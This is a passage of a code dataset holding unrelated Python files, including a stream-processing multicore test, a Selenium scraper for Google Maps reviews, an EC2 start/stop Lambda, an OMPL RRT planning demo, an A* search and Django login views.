main_lock\n this_process.NUM_PROCESSES = len(processes)\n this_process.all_process_specs = processes\n this_process.all_procs = procs\n for name in processes.keys():\n procs[name].make_process()\n for name in processes.keys():\n procs[name].process.start()\n for name in processes.keys():\n procs[name].process.join()\n for name in processes.keys():\n procs[name].process.terminate()\n\ndef run_single_process_single_source(source_func, compute_func, source_type='f',\n **source_keyword_args):\n \"\"\"\n Function for creating a multiprocess application consisting\n of a single process with a single source and no actuators\n and with no external input or output streams from or to other\n processes.\n This function creates the process, starts the process and\n finally joins (stops) the process.\n \"\"\"\n\n # Specify processes and connections.\n processes = \\\n {\n 'process':\n {'in_stream_names_types': [('in', source_type)],\n 'out_stream_names_types': [],\n 'compute_func': compute_func,\n 'sources':\n {'single_source':\n {'type': source_type,\n 'func': source_func\n },\n },\n 'actuators': {}\n }\n }\n \n connections = \\\n {\n 'process' :\n {\n 'single_source' : [('process', 'in')]\n }\n }\n\n multicore(processes, connections)\n \n \n#-------------------------------------------------------------\n# TEST\n#-------------------------------------------------------------\n\n@map_e\ndef gg(v, ADD_VALUE):\n return v + ADD_VALUE\n\n@map_e\ndef increment(v): return v+1\n \ndef test_parameter(ADDEND_VALUE):\n # Functions wrapped by agents\n # Function f is used in get_source_data_and_compute_process\n # ADDEND is a keyword arg of f.\n # Note: ADDEND must be passed in the specification of\n # the process. 
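    # For readers unfamiliar with the basics helpers: @map_e (imported above)
    # wraps an element function so it can run as a stream agent. Under that
    # reading, the decorated
    #     @map_e
    #     def gg(v, ADD_VALUE): return v + ADD_VALUE
    # is invoked as gg(in_stream, out_stream, ADD_VALUE=10), applying v + 10 to
    # every element. The keyword argument must be a constant, which is why
    # ADDEND travels through the process spec's 'keyword_args' entry rather
    # than through a stream.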
See the line:\n # 'keyword_args' : {'ADDEND' :ADDEND_VALUE},\n def f(in_streams, out_streams, ADDEND):\n gg(in_streams[0], out_streams[0], ADD_VALUE=ADDEND)\n # Function g is used in aggregate_and_output_process\n # Function g has no arguments other than in_streams and out_streams.\n # So we do not have to add 'keyword_args' : {}\n # to the specification of the process.\n def g(in_streams, out_streams):\n s = Stream(name='s')\n increment(in_stream=in_streams[0], out_stream=s)\n print_stream(s, name=s.name)\n\n # Target of source thread.\n def source_thread_target(source):\n num_steps=3\n step_size=3\n for i in range(num_steps):\n data = list(range(i*step_size, (i+1)*step_size))\n copy_data_to_source(data, source)\n time.sleep(0.001)\n source_finished(source)\n return\n\n #---------------------------------------------------------------------\n # Specify processes and connections.\n # This example has two processes:\n # (1) get_source_data_and_compute_process and\n # (2) aggregate_and_output_process.\n \n # Specification of get_source_data_and_compute_process:\n # (1) Inputs: It has a single input stream called 'in' which\n # is of type int ('i').\n # (2) Outputs: It has a single output stream called 'out'\n # which is of type int ('i').\n # (3) Computation: It creates a network of agents that carries\n # out computation in the main thread by calling function f.\n # (4) Keyword arguments: Function f has a keyword argument\n # called ADDEND. This argument must be a constant.\n # (5) sources: This process has a single source called\n # 'acceleration'. The source thread target is specified by\n # the function source_thread_target. This function generates\n # int ('i').\n # (6) actuators: This process has no actuators.\n \n # Specification of aggregate_and_output_process:\n # (1) Inputs: It has a single input stream called 'in' which\n # is of type int ('i').\n # (2) Outputs: It has no outputs.\n # (3) Computation: It creates a network of agents that carries\n # out computation in the main thread by calling function g.\n # (4) Keyword arguments: Function g has no keyword argument\n # (5) sources: This process has no sources\n # (6) actuators: This process has no actuators.\n\n # Connections between processes.\n # (1) Output 'out' of 'get_source_data_and_compute_process' is\n # connected to input 'in' of aggregate_and_output_process.\n # (2) The source, 'acceleration', of 'get_source_data_and_compute_process'\n # is connected to input 'in' of 'get_source_data_and_compute_process'.\n \n processes = \\\n {\n 'get_source_data_and_compute_process':\n {'in_stream_names_types': [('in', 'i')],\n 'out_stream_names_types': [('out', 'i')],\n 'compute_func': f,\n 'keyword_args' : {'ADDEND' :ADDEND_VALUE},\n 'sources':\n {'acceleration':\n {'type': 'i',\n 'func': source_thread_target\n },\n },\n 'actuators': {}\n },\n 'aggregate_and_output_process':\n {'in_stream_names_types': [('in', 'i')],\n 'out_stream_names_types': [],\n 'compute_func': g,\n 'keyword_args' : {},\n 'sources': {},\n 'actuators': {}\n }\n }\n \n connections = \\\n {\n 'get_source_data_and_compute_process' :\n {\n 'out' : [('aggregate_and_output_process', 'in')],\n 'acceleration' : [('get_source_data_and_compute_process', 'in')]\n },\n 'aggregate_and_output_process':\n {}\n }\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # Create and run multiple processes in a multicore machine.\n multicore(processes, connections)\n\ndef 
test_single_process_single_source():\n # Target of source thread.\n def source_func(source):\n num_steps=5\n step_size=4\n for i in range(num_steps):\n data = list(range(i*step_size, (i+1)*step_size))\n copy_data_to_source(data, source)\n time.sleep(0.001)\n source_finished(source)\n def compute_func(in_streams, out_streams):\n print_stream(in_streams[0])\n\n run_single_process_single_source(source_func, compute_func)\n\n\n\n\n\nif __name__ == '__main__':\n print ('Output printed are values of stream s. See function g')\n print ('s[j] = 500 + j, because the ADDEND is 500')\n test_parameter(500)\n test_single_process_single_source()\n","sub_path":"IoTPy/concurrency/multicore.py","file_name":"multicore.py","file_ext":"py","file_size_in_byte":40158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"192465831","text":"import os\nimport sys\nimport numpy as np\nimport cv2\nimport easygui\nfrom error_remover import *\nnaming=np.load(\"database/naming.npy\")\ndatabase=np.load(\"database/data.npy\")\nlocations=np.load(\"database/locations.npy\")\nlabels=np.load(\"database/labels.npy\")\ndef dist(x,y):\n x=np.array(x)\n y=np.array(y)\n #print len(x),len(y)\n return np.sqrt(np.sum((x-y)**2))\ndef match(path,limit):\n #print person\n img=cv2.imread(path,1)\n output,distances,tips,valleys=midfinger(img)\n d=[]\n\n for i in database:\n d.append(dist(distances,i))\n temp=np.copy(labels)\n d,temp=zip(*sorted(zip(d,temp)))\n\n temp=temp[1:limit]\n #for i in temp:\n #print naming[i]\n label=np.bincount(temp).argmax()\n return naming[label]\n\nif __name__=='__main__':\n path=easygui.fileopenbox(\"open the image you want to check on\")\n result=match(path,2)\n easygui.msgbox(result)\n","sub_path":"matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"415245254","text":"import sys\nfrom PyQt5.Qt import *\nfrom utils.constance import (\n MAX_RECT_NUM\n)\nimport transit\n\n\nclass Rect(object):\n def __init__(self):\n self.start_x = int()\n self.start_y = int()\n self.end_x = int()\n self.end_y = int()\n self.area = int()\n\n\nclass ImgLb(QLabel):\n rect_list = list()\n flag = False\n right_click = pyqtSignal()\n\n def mousePressEvent(self, a0: QMouseEvent) -> None:\n if a0.buttons() == Qt.LeftButton:\n if a0.x() > transit.img_width or a0.y() > transit.img_height:\n return\n self.flag = True\n self.rect = Rect()\n self.rect_list.append(self.rect)\n if len(self.rect_list) > MAX_RECT_NUM != 0:\n self.rect_list.pop(0)\n self.rect.start_x = a0.x()\n self.rect.start_y = a0.y()\n self.rect.end_x = a0.x()\n self.rect.end_y = a0.y()\n elif a0.buttons() == Qt.RightButton:\n if not transit.img_flag or (a0.y() > transit.img_height or a0.x() > transit.img_width):\n self.right_click.emit()\n\n def mouseMoveEvent(self, a0: QMouseEvent) -> None:\n if self.flag and transit.img_flag:\n x = a0.x()\n y = a0.y()\n if 0 < x < transit.img_width:\n self.rect.end_x = x\n elif x <= 0:\n self.rect.end_x = 0\n else:\n self.rect.end_x = transit.img_width\n if 0 < y < transit.img_height:\n self.rect.end_y = y\n elif y <= 0:\n self.rect.end_y = 0\n else:\n self.rect.end_y = transit.img_height\n self.update()\n\n def mouseReleaseEvent(self, a0: QMouseEvent) -> None:\n if not self.flag:\n return\n self.flag = False\n self.rect.area = abs(self.rect.end_x - self.rect.start_x) * abs(self.rect.end_y - self.rect.start_y)\n if self.rect.area < 9:\n 
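            # A selection smaller than 9 px^2 (i.e. under a 3x3 box) is treated
            # as an accidental click rather than a deliberate rectangle, so the
            # rect appended in mousePressEvent is discarded again.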
self.rect_list.pop()\n if self.rect.start_x > self.rect.end_x:\n self.rect.start_x, self.rect.end_x = self.rect.end_x, self.rect.start_x\n if self.rect.start_y > self.rect.end_y:\n self.rect.start_y, self.rect.end_y = self.rect.end_y, self.rect.start_y\n\n if len(self.rect_list) == 2:\n big_box = self.rect_list[0]\n sml_box = self.rect_list[1]\n if big_box.area < sml_box.area:\n big_box, sml_box = sml_box, big_box\n temp_start_x = max(big_box.start_x, sml_box.start_x)\n temp_start_y = max(big_box.start_y, sml_box.start_y)\n temp_end_x = min(big_box.end_x, sml_box.end_x)\n temp_end_y = min(big_box.end_y, sml_box.end_y)\n if temp_start_x >= temp_end_x or temp_start_y >= temp_end_y:\n QMessageBox.information(self, \"warning\", \"A small box must be nested in a big box.\", QMessageBox.Ok)\n self.rect_list.pop()\n self.update()\n return\n else:\n index = self.rect_list.index(sml_box)\n sml_box.start_x = temp_start_x\n sml_box.start_y = temp_start_y\n sml_box.end_x = temp_end_x\n sml_box.end_y = temp_end_y\n self.rect_list[index] = sml_box\n self.update()\n\n def paintEvent(self, a0: QPaintEvent) -> None:\n super().paintEvent(a0)\n painter = QPainter()\n painter.begin(self)\n painter.setPen(QPen(Qt.red, 2, Qt.SolidLine))\n for rect in self.rect_list:\n painter.drawRect(rect.start_x, rect.start_y, rect.end_x - rect.start_x, rect.end_y - rect.start_y)\n painter.end()\n","sub_path":"img_lb.py","file_name":"img_lb.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372386345","text":"\nimport json\n\nimport os\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import datetime\nimport time\nfrom dateutil.relativedelta import relativedelta\nimport re\n\nclass ReviewScraper():\n def __init__(self):\n self.driver = self.__get_driver()\n\n def __get_driver(self,debug=False):\n options = Options()\n\n if not debug:\n options.add_argument(\"--headless\")\n options.add_argument('--no-sandbox')\n else:\n options.add_argument(\"--window-size=1366,768\")\n options.add_argument('--no-sandbox')\n\n options.add_argument(\"--disable-notifications\")\n options.add_argument('--disable-gpu')\n options.add_argument(\"--lang=en-US\")\n driv_path = '../config/webdrivers/chromedriver.exe'\n input_driver = webdriver.Chrome(options=options, executable_path=driv_path)\n\n return input_driver\n def get_map_url(self, rest_name, rest_add):\n rest_name = rest_name.replace('&', '+%26+')\n url = 'https://www.google.com/search?q=' + rest_name + ' ' + rest_add\n self.driver.get(url)\n time.sleep(1)\n\n response = BeautifulSoup(self.driver.page_source, 'html.parser')\n for res in response.find_all('a', href=True):\n if 'maps.google' in res['href']:\n map_url = res['href']\n return map_url\n def __sort_review(self):\n wait = WebDriverWait(self.driver, 10)\n\n menu_bt = wait.until(EC.element_to_be_clickable((By.XPATH, '//button[@data-value=\\'Sort\\']')))\n menu_bt.click()\n time.sleep(1)\n recent_rating_bt = self.driver.find_elements_by_xpath('//li[@role=\\'menuitemradio\\']')[1]\n recent_rating_bt.click()\n time.sleep(0.5)\n\n\n def __goto_review(self):\n links = 
self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.rating.moreReviews\\']')\n # print(links)\n for l in links:\n # print(\"Element is visible? \" + str(l.is_displayed()))\n l.click()\n time.sleep(1)\n\n def __scroll(self):\n\n scrollable_div = self.driver.find_element_by_xpath('//*[@id=\"pane\"]/div/div[1]/div/div/div[2]')\n prev_scroll_height = None\n while True:\n self.driver.execute_script('arguments[0].scrollTop = arguments[0].scrollHeight',\n scrollable_div)\n last_height = (self.driver.execute_script(\"return arguments[0].scrollTop\", scrollable_div))\n\n scroll_height = (self.driver.execute_script(\"return arguments[0].scrollHeight\", scrollable_div))\n\n if scroll_height == prev_scroll_height:\n # print('End of Scrolling')\n break\n prev_scroll_height = scroll_height\n time.sleep(1.25)\n\n def __expand_reviews(self):\n links = self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.review.expandReview\\']')\n for l in links:\n l.click()\n time.sleep(0.25)\n # print('Review Expanded')\n\n def url_setup(self,url):\n self.driver.get(url)\n time.sleep(2)\n self.__goto_review()\n self.__sort_review()\n\n def get_reviews_block(self, offset,cbg, place_id):\n\n # scroll to load reviews\n\n self.__scroll()\n\n self.__expand_reviews()\n\n resp = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n rblock = resp.find_all('div', class_='ODSEW-ShBeI NIyLF-haAclf gm2-body-2')\n parsed_reviews = []\n for index, review in enumerate(rblock):\n if index >= offset:\n parsed_reviews.append(self.parse_review(review,cbg, place_id))\n # print(self.parse_review(review,cbg))\n\n return parsed_reviews\n\n # def parse_fname(self, fpath):\n\n\n def get_reviews(self,N,cbg, place_id,rest_name, rest_add):\n map_url = self.get_map_url(rest_name, rest_add)\n self.url_setup(map_url)\n\n n = 0\n all_revs = []\n dpath = '../data/outputs/reviews/'\n os.makedirs(dpath, exist_ok=True)\n fpath = dpath + str(cbg) + '_' + place_id + '.json'\n file_list = [dpath + f for f in os.listdir(dpath)]\n last_counter = -1\n if fpath not in file_list:\n while ((n < N) and (n != last_counter)):\n\n reviews = self.get_reviews_block( n,cbg, place_id)\n\n for r in reviews:\n all_revs.append(r)\n\n with open(fpath, 'w') as outfile:\n json.dump(all_revs,outfile, indent=4, sort_keys=True, default=str)\n #\n # json.dump(all_revs, outfile, indent=4)\n n += len(reviews)\n\n last_counter = n\n return all_revs\n\n def filter_string(self, str):\n strOut = str.replace('\\r', ' ').replace('\\n', ' ').replace('\\t', ' ').replace(\"\\\\\",\"\")\n return strOut\n\n def parse_review(self,result,cbg, place_id):\n\n\n rev_item = {}\n if (result.find('span', class_='ODSEW-ShBeI-H1e3jb') != None):\n rev_item['user_name'] = (result['aria-label'])\n\n rev_item['review_id'] = result['data-review-id']\n user_link = result.find('div', class_='ODSEW-ShBeI-content').find('a', class_=\"ODSEW-ShBeI-t1uDwd-hSRGPd\")[\n 'href']\n rev_item['user_id'] = [int(s) for s in user_link.split('/') if s.isdigit()][0]\n if 'aria-label' in result.find('span', class_='ODSEW-ShBeI-H1e3jb').attrs:\n rev_item['rating'] = int(result.find('span', class_='ODSEW-ShBeI-H1e3jb')['aria-label'][:2])\n\n dt = (result.find('span', class_='ODSEW-ShBeI-RgZmSc-date').text)\n dt = dt.replace('a ', '1 ')\n dt = dt.replace('an ', '1 ')\n value, unit = re.search(r'(\\d+) (\\w+) ago', dt).groups()\n\n if not unit.endswith('s'): unit += 's'\n delta = relativedelta(**{unit: int(value)})\n rev_item['review_date'] = datetime.now() - delta\n\n rev_item['review'] = 
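        # A worked example of the relative-date handling above: Google renders
        # review ages as text such as '3 weeks ago' or 'a month ago'. After the
        # 'a '/'an ' -> '1 ' rewrite, re.search(r'(\d+) (\w+) ago', dt) yields
        # ('3', 'weeks'); the unit is pluralised when needed so that
        # relativedelta(**{'weeks': 3}) is a valid call, and the absolute
        # timestamp is then datetime.now() - relativedelta(weeks=3).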
result.find('span', class_='ODSEW-ShBeI-text').text\n\n user_info = result.find('div', class_='ODSEW-ShBeI-VdSJob')\n if user_info:\n\n if 'style' in user_info.find('span').attrs:\n rev_item['local_guide'] = 'No'\n\n else:\n rev_item['local_guide'] = 'Yes'\n n_reviews = user_info.find_all('span')[1].text\n if 'reviews' in n_reviews:\n n_reviews = n_reviews.replace(',','')\n rev_item['user_reviews'] = int(re.findall(r'(\\d+)', n_reviews)[0])\n\n\n user_pics = result.find('div', class_='ODSEW-ShBeI-Jz7rA')\n n_pics = 0\n if user_pics:\n n_pics = len(user_pics.find_all('button'))\n rev_item['user_pictures'] = n_pics\n rev_item['cbg'] = cbg\n rev_item['place_id'] = place_id\n return rev_item\n\n def get_place_data(self,url):\n\n self.driver.get(url)\n\n # ajax call also for this section\n time.sleep(2)\n place = {}\n resp = BeautifulSoup(self.driver.page_source, 'html.parser')\n try:\n place['overall_rating'] = float(resp.find('div', class_='gm2-display-2').text.replace(',', '.'))\n except:\n place['overall_rating'] = 'NOT FOUND'\n\n try:\n place['n_reviews'] = int(self.driver.find_elements_by_xpath('//button[@jsaction=\\'pane.reviewChart.moreReviews\\']')[0].text.split(' ')[0])\n except:\n place['n_reviews'] = 0\n\n return place\n\n def generate_map_url(self, rest_name, rest_add):\n url = 'https://www.google.com/search?q=' + rest_name + ' ' + rest_add\n self.driver.get(url)\n response = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n for res in response.find_all('a', href=True):\n if 'maps.google' in res['href']:\n map_url = res['href']\n return map_url\n\n def scrape_reviews(self,rest_name, rest_add, cbg, place_id):\n map_url = self.generate_map_url(rest_name, rest_add)\n self.get_reviews(self, N, cbg, place_id, map_url)\n\n","sub_path":"src/utils/review_etl.py","file_name":"review_etl.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153471060","text":"import boto3\nimport json\nfrom utils import create_response\n\ndef lambda_handler(event, context):\n ec2 = boto3.resource('ec2')\n\n request_body = event\n\n if (request_body['secret'] != secret_password):\n return create_response('Incorrect secret. Please enter a valid secret to alter server settings', None)\n\n instance_id = request_body['instance_id']\n instances = list(ec2.instances.filter(InstanceIds=[instance_id]))\n\n if (len(instances) != 1):\n return create_response(f'Instance: {instance_id} not found', None)\n\n instance = instances[0]\n message = ''\n\n # AWS instance state codes reference:\n # 0 : pending\n # 16 : running\n # 32 : shutting-down\n # 48 : terminated\n # 64 : stopping\n # 80 : stopped\n\n if (instance.state['Name'] == 'running'):\n # shut er down\n instance.stop()\n message = f'Initiated stop server command on {instance_id}'\n\n elif (instance.state['Name'] == 'stopped'):\n # start er up\n instance.start()\n message = f'Initiated start server command on {instance_id}'\n\n else:\n # pending, shutting down, terminated, or stopping\n message = f'Server is busy starting, shutting down, terminating, or stopping. 
Please try again later'\n\n return create_response(None, message)\n","sub_path":"python/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56253633","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ik_events_todays_occurrences', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='todaysoccurrences',\n name='fall_back_to_next_day',\n field=models.BooleanField(default=True, help_text=b\"if there are no events to show on a day, show the next day's instead.\"),\n ),\n migrations.AddField(\n model_name='todaysoccurrences',\n name='title',\n field=models.CharField(max_length=255, help_text=b'Title to show. Natural date is appended.', blank=True),\n ),\n ]\n","sub_path":"icekit_events/plugins/todays_occurrences/migrations/0002_auto_20161207_1928.py","file_name":"0002_auto_20161207_1928.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650921297","text":"from ompl import util as ou\nfrom ompl import base as ob\nfrom ompl import geometric as og\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport random\n\nradius = 100\ncenter = [250, 250]\n\n\nclass ValidityChecker(ob.StateValidityChecker):\n # Returns whether the given state's position overlaps the\n # circular obstacle\n def isValid(self, state):\n x = state[0]\n y = state[1]\n # if (self.clearance(state) < 0.0):\n # print(\"x:\",x,\", y:\",y,\",clearance: \",self.clearance(state))\n return self.clearance(state) > 0.0\n\n # Returns the distance from the given state's position to the\n # boundary of the circular obstacle.\n def clearance(self, state):\n # Extract the robot's (x,y) position from its state\n x = state[0]\n y = state[1]\n # Distance formula between two points, offset by the circle's\n # radius\n return sqrt((x - center[0]) * (x - center[0]) + (y - center[0]) * (y - center[0])) - radius\n\n\ndef getPathLengthObjective(si):\n return ob.PathLengthOptimizationObjective(si)\n\n\ndef getThresholdPathLengthObj(si):\n obj = ob.PathLengthOptimizationObjective(si)\n obj.setCostThreshold(ob.Cost(1.51))\n return obj\n\n\n# Keep these in alphabetical order and all lower case\ndef allocatePlanner(si, plannerType):\n if plannerType.lower() == \"bfmtstar\":\n return og.BFMT(si)\n elif plannerType.lower() == \"bitstar\":\n return og.BITstar(si)\n elif plannerType.lower() == \"fmtstar\":\n return og.FMT(si)\n elif plannerType.lower() == \"informedrrtstar\":\n return og.InformedRRTstar(si)\n elif plannerType.lower() == \"prmstar\":\n return og.PRMstar(si)\n elif plannerType.lower() == \"rrt\":\n return og.RRT(si)\n elif plannerType.lower() == \"rrtstar\":\n return og.RRTstar(si)\n elif plannerType.lower() == \"sorrtstar\":\n return og.SORRTstar(si)\n else:\n ou.OMPL_ERROR(\"Planner-type is not implemented in allocation function.\")\n\n\n# Keep these in alphabetical order and all lower case\ndef allocateObjective(si, objectiveType):\n if objectiveType.lower() == \"pathclearance\":\n return getClearanceObjective(si)\n elif objectiveType.lower() == \"pathlength\":\n return getPathLengthObjective(si)\n elif objectiveType.lower() == \"thresholdpathlength\":\n return getThresholdPathLengthObj(si)\n elif objectiveType.lower() == \"weightedlengthandclearancecombo\":\n 
return getBalancedObjective1(si)\n else:\n ou.OMPL_ERROR(\"Optimization-objective is not implemented in allocation function.\")\n\n\ndef plan(runTime, plannerType, objectiveType, fname):\n # Construct the robot state space in which we're planning. We're\n # planning in [0,500]x[0,500], a subset of R^2.\n space = ob.RealVectorStateSpace(2)\n\n # Set the bounds of space to be in [0,500].\n space.setBounds(0.0, 500.0)\n\n # Construct a space information instance for this state space\n si = ob.SpaceInformation(space)\n\n # Set the object used to check which states in the space are valid\n validityChecker = ValidityChecker(si)\n si.setStateValidityChecker(validityChecker)\n\n si.setup()\n\n # Set our robot's starting state to be random\n start = ob.State(space)\n start[0] = random.randint(0, 500)\n start[1] = random.randint(0, 500)\n\n while (sqrt((start[0] - center[0]) * (start[0] - center[0]) + (start[1] - center[1]) * (\n start[1] - center[1])) - radius < 0):\n start[0] = random.randint(0, 500)\n start[1] = random.randint(0, 500)\n\n # Set our robot's goal state to be random \n goal = ob.State(space)\n goal[0] = random.randint(0, 500)\n goal[1] = random.randint(0, 500)\n while (sqrt((goal[0] - center[0]) * (goal[0] - center[0]) + (goal[1] - center[1]) * (\n goal[1] - center[1])) - radius < 0):\n goal[0] = random.randint(0, 500)\n goal[1] = random.randint(0, 500)\n\n # Create a problem instance\n pdef = ob.ProblemDefinition(si)\n\n # Set the start and goal states\n pdef.setStartAndGoalStates(start, goal)\n\n # Create the optimization objective specified by our command-line argument.\n # This helper function is simply a switch statement.\n pdef.setOptimizationObjective(allocateObjective(si, objectiveType))\n\n # Construct the optimal planner specified by our command line argument.\n # This helper function is simply a switch statement.\n optimizingPlanner = allocatePlanner(si, plannerType)\n\n # Set the problem instance for our planner to solve\n optimizingPlanner.setProblemDefinition(pdef)\n optimizingPlanner.setup()\n\n # attempt to solve the planning problem in the given runtime\n solved = optimizingPlanner.solve(runTime)\n\n if solved:\n # Output the length of the path found\n print('{0} found solution of path length {1:.4f} with an optimization ' \\\n 'objective value of {2:.4f}'.format( \\\n optimizingPlanner.getName(), \\\n pdef.getSolutionPath().length(), \\\n pdef.getSolutionPath().cost(pdef.getOptimizationObjective()).value()))\n matrix = pdef.getSolutionPath().printAsMatrix()\n print(matrix)\n verts = []\n for line in matrix.split(\"\\n\"):\n x = []\n for item in line.split():\n x.append(float(item))\n if len(x) != 0:\n verts.append(list(x))\n # print(verts)\n plt.axis([0, 500, 0, 500])\n x = []\n y = []\n for i in range(0, len(verts)):\n x.append(verts[i][0])\n y.append(verts[i][1])\n # plt.plot(verts[i][0], verts[i][1], 'r*-')\n plt.plot(x, y, 'ro-')\n plt.show()\n # If a filename was specified, output the path as a matrix to\n # that file for visualization\n if fname:\n with open(fname, 'w') as outFile:\n outFile.write(pdef.getSolutionPath().printAsMatrix())\n else:\n print(\"No solution found.\")\n\n\nif __name__ == \"__main__\":\n plan(10, 'RRT', 'PathLength', 'path.txt')\n","sub_path":"RRT_old.py","file_name":"RRT_old.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
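# Annotator note (not part of RRT_old.py): the allocatePlanner/allocateObjective
# helpers above are string-keyed switches. A hedged sketch of an equivalent
# dict-based dispatch, reusing only the og/ou names already imported in that file:
#
#     PLANNERS = {"rrt": og.RRT, "rrtstar": og.RRTstar, "bitstar": og.BITstar}
#
#     def allocatePlanner(si, plannerType):
#         try:
#             return PLANNERS[plannerType.lower()](si)
#         except KeyError:
#             ou.OMPL_ERROR("Planner-type is not implemented in allocation function.")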
 +{"seq_id":"596957496","text":"#!/usr/bin/python36\nimport subprocess as sp\n\n\n\nclass Port:\n#\tports=sp.getoutput(\"sudo netstat -tunlep | grep LISTEN | awk '{print $4}' \")\n\tports=\"\"\n\tusedPorts=[]\n\tnewPort=0\n\tdef __init__(self):\n\t\tself.ports=sp.getoutput(\"sudo netstat -tunlep | grep LISTEN | awk '{print $4}' \")\n\t\tself.ports = self.ports.split(\"\\n\")\n\t\tself.usedPorts=[]\n\t\tself.newPort=0\n\tdef getUsedPorts(self):\n\t\tfor i in self.ports:\n\t\t\tself.usedPorts.append(int(i.split(\":\")[-1]))\n\t\treturn self.usedPorts\t\n\tdef getNewPort(self):\n\t\tself.usedPorts=self.getUsedPorts()\n\t\tfor i in range(1024,65535):\n\t\t\tif i not in self.usedPorts:\n\t\t\t\tself.newPort=i\n\t\t\t\treturn self.newPort\n\n#test.getUsedPorts()\n#clientName=input(\"enter client name: \")\n\n#print(sp.getoutput(\"docker run -dit --name {} -p {}:3333 xpra_vlc:v4\".format(clientName,newPort)))\n#print(newPort)\n#print(\"website is available at http://192.168.56.101:{}\".format(newPort))\n","sub_path":"cgi-bin/major2/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"524618941","text":"#!/usr/bin/python3\ndef reconstruct_path(came_from, current):\n total_path = [current]\n while current in came_from:\n current = came_from[current]\n total_path.insert(0, current)\n\n return total_path\n\n\nINF = float('inf')\n\n\ndef a_star(start, goal, neighbors, h):\n open_set = [start]\n came_from = {}\n\n # Cost of path from start node to n\n g_score = {}\n g_score[start] = 0\n\n # Estimated cost of path from start node through n to goal\n # This is an estimate of the total path cost\n f_score = {}\n f_score[start] = h(start, goal)\n\n while len(open_set) > 0:\n open_set.sort(key=lambda id: f_score.get(id, INF))\n current = open_set.pop(0)\n\n if current == goal:\n return reconstruct_path(came_from, current)\n\n for neighbor, d in neighbors(current):\n tentative_g_score = g_score.get(current, INF) + d\n if tentative_g_score < g_score.get(neighbor, INF):\n # This path to neighbor is the best one seen so far\n came_from[neighbor] = current\n g_score[neighbor] = tentative_g_score\n f_score[neighbor] = g_score[neighbor] + h(neighbor, goal)\n\n if neighbor not in open_set:\n open_set.append(neighbor)\n","sub_path":"step3/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
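# Annotator note (not part of step3/a_star.py): a minimal usage sketch for
# a_star() above. neighbors() must return (node, edge_cost) pairs and h() an
# admissible heuristic; h = 0 makes A* behave like Dijkstra's algorithm.
#
#     edges = {'a': [('b', 1)], 'b': [('a', 1), ('c', 2)], 'c': [('b', 2)]}
#     path = a_star('a', 'c', lambda n: edges[n], lambda n, goal: 0)
#     assert path == ['a', 'b', 'c']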
 +{"seq_id":"19200498","text":"from django.shortcuts import render,redirect\nfrom api.models import Teacher,Company,BaseUser\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import resolve_url\nfrom django.template.response import TemplateResponse\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\n\ndef main(request):\n if request.user.pk is None:\n return redirect('teacher_main')\n elif request.user.user_type==0:\n return redirect('teacher_main')\n else :\n return redirect('office_main')\n\ndef register_select(request):\n return render(request, 'register_select.html')\n\n\ndef check_type(request):\n if request.user.user_type==0:\n return redirect('teacher_main')\n return redirect('office_main')\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n user=form.get_user()\n auth_login(request, user)\n if user.user_type==0:\n redirect_to = resolve_url('/teacher/main/')\n else :\n redirect_to = resolve_url('/office/main/')\n return HttpResponseRedirect(redirect_to)\n else:\n form = AuthenticationForm(request)\n\n return TemplateResponse(request, 'login.html', {'form': form})\n\n@csrf_exempt\ndef id_check(request):\n if request.method==\"POST\":\n username=request.POST['id']\n\n count=BaseUser.objects.filter(username=username).count()\n if count>0 :\n return HttpResponse(json.dumps(\"\"), status=201)\n return HttpResponse(json.dumps(\"\"),status=200)\n return HttpResponse(status=400)\n\n@csrf_exempt\ndef email_check(request):\n if request.method==\"POST\":\n email=request.POST['email']\n\n count=BaseUser.objects.filter(email=email).count()\n if count>0 :\n return HttpResponse(json.dumps(\"\"), status=201)\n return HttpResponse(json.dumps(\"\"),status=200)\n return HttpResponse(status=400)\n\ndef find_user(request):\n if request.user.pk is None:\n return None\n elif 